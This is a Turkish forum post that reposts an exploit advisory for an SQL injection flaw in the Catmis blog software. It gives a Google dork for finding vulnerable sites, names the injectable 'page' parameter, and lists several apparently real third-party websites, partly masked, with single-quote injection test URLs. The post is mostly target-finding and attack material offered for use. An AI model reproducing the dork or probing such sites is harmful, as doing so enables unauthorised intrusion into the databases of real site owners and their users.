Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Catmis Sql Injection Vulnerability
DaRKNeSS
*
avatar
Binbaşı
Durum: Çevrimdışı
Seviye Puanı: 53
Yaşam Puanı: 1,315 / 1,315
Deneyim: 61 / 100
Rep Sayısı: 116
Mesaj Sayısı: 5586
Üyelik Tarihi: 11.08.2013
     
Yorum: #1
Catmis Sql Injection Vulnerability
20.01.2014 09:29
cyberizm

Exploit Title : Catmis Sql Injection Vulnerability
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://code.google.com/p/catmis/
Google Dork : inurl:blog/blog.php?blogId=1 inurl:categoryId=
Date: 2013/11/102

Tested on:
Windows 7 , Linux
——————————————————————-
Exploit : Sql Injection
Location :
PHP Kod:
[Target]/www.scienceathome.org/blog/blog.php?blogId=1&categoryId=-1&page=[Sql Injection
Proof:

PHP Kod:
http://www.scienceathoXXme.org/blog/blog.php?blogId=1&categoryId=-1&page=’

https://www.vidensbXXroend.dk/blog/blog.php?blogId=1&categoryId=-1&page=’

http://www.geigerXXrecords.dk/blog/blog.php?blogId=1&categoryId=3&page=’

http://solikedorXXian.dk/blog/blog.php?blogId=1&categoryId=1&page=’

http://www.krXweb.dk/blog/blog.php?blogId=1&categoryId=1&page=’ 


Alinti



1 Ziyaretçi